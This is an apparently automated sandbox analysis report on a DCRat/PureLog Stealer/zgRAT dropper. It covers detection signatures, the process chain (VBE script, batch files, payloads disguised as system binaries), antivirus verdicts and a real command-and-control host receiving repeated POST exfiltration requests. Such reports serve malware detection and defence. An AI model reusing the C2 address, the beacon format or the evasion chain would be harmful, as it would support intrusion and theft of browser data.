Windows Analysis Report
hT7clR9Gz2.exe

Overview

General Information

Sample name: hT7clR9Gz2.exe (renamed because original name is a hash value)
Original sample name: 0CADB063C76CEC669E88F104493A56F1.exe
Analysis ID: 1403707
MD5: 0cadb063c76cec669e88f104493a56f1
SHA1: 929cf2e69d8afe9485d47a4a1c80cfe5a0ac9321
SHA256: 31c9aec77607a885cf75c66cd02b721bf4a866444d58bf2eaa766ef928830cb3
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • hT7clR9Gz2.exe (PID: 6532 cmdline: C:\Users\user\Desktop\hT7clR9Gz2.exe MD5: 0CADB063C76CEC669E88F104493A56F1)
    • wscript.exe (PID: 6252 cmdline: "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hyperbrokerhostNetsvc.exe (PID: 5492 cmdline: C:\PortCommon/hyperbrokerhostNetsvc.exe MD5: 6BB2A8990AE25FE86B233C31D6CB93BC)
          • cmd.exe (PID: 6396 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3780 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 5564 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • vVSUwBXtljAfFANPiZBBPFzlgh.exe (PID: 4980 cmdline: "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe" MD5: 6BB2A8990AE25FE86B233C31D6CB93BC)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.2002850710.0000000006AB7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\PortCommon\hyperbrokerhostNetsvc.exe, ProcessId: 5492, TargetFilename: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user\Desktop\hT7clR9Gz2.exe, ParentImage: C:\Users\user\Desktop\hT7clR9Gz2.exe, ParentProcessId: 6532, ParentProcessName: hT7clR9Gz2.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" , ProcessId: 6252, ProcessName: wscript.exe

Timestamp: 03/05/24-22:27:38.801530
SID: 2048095
Source Port: 49712
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: http://h172956.srv11.test-hf.su/ | Avira URL Cloud: Label: malware
Source: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php(gI | Avira URL Cloud: Label: malware
Source: http://h172956.srv11.test-hf.su | Avira URL Cloud: Label: malware
Source: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php | Avira URL Cloud: Label: malware
Source: C:\Users\user\Desktop\MjOKfqVp.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\Desktop\DjncgsWF.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\NcaIHEGQ.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\CNmCQxgq.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\RFZqtRqa.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\PortCommon\sihost.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\YQFyrQBy.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\hgVgFZAw.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | ReversingLabs: Detection: 87%
Source: C:\PortCommon\sihost.exe | ReversingLabs: Detection: 87%
Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\DjncgsWF.log | ReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\YQFyrQBy.log | ReversingLabs: Detection: 62%
Source: hT7clR9Gz2.exe | ReversingLabs: Detection: 55%
Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EgPkCslz.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RFZqtRqa.log | Joe Sandbox ML: detected
Source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe | Joe Sandbox ML: detected
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Joe Sandbox ML: detected
Source: C:\PortCommon\sihost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\aSrhMzGt.log | Joe Sandbox ML: detected
Source: hT7clR9Gz2.exe | Joe Sandbox ML: detected

Compliance

Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Unpacked PE file: 6.2.hyperbrokerhostNetsvc.exe.3080000.2.unpack
Source: hT7clR9Gz2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Directory created: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe | Directory created: C:\Program Files\Microsoft Office 15\ClientX64\56085415360792
Source: hT7clR9Gz2.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: hT7clR9Gz2.exe
                          Source: Binary string: lC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: yC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: mC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: 0_2_007CA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_007CA69B
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: 0_2_007DC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_007DC220
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: 0_2_007EB348 FindFirstFileExA, 0_2_007EB348
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File opened: C:\Users\user
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File opened: C:\Users\user\AppData
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File opened: C:\Users\user\AppData\Local
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Code function: 4x nop then jmp 00007FF848F22426h 6_2_00007FF848F1087A
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 6_2_00007FF8490BBABD
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 4x nop then jmp 00007FF848F22426h 12_2_00007FF848F1087A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 12_2_00007FF8490BBABD

                          Networking

                          Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.5:49712 -> 91.227.16.11:80
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox View IP Address: 91.227.16.11
                          Source: Joe Sandbox View ASN Name: EXIMIUS-ASRU
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 384 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 2596 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 1908 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 2596 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 1920 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 2592 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 2592 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 2584 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----NXSs6uGjFUy79BBdK9dKPvwpKOgkEkW40K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: h172956.srv11.test-hf.su Content-Length: 141782 Expect: 100-continue Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
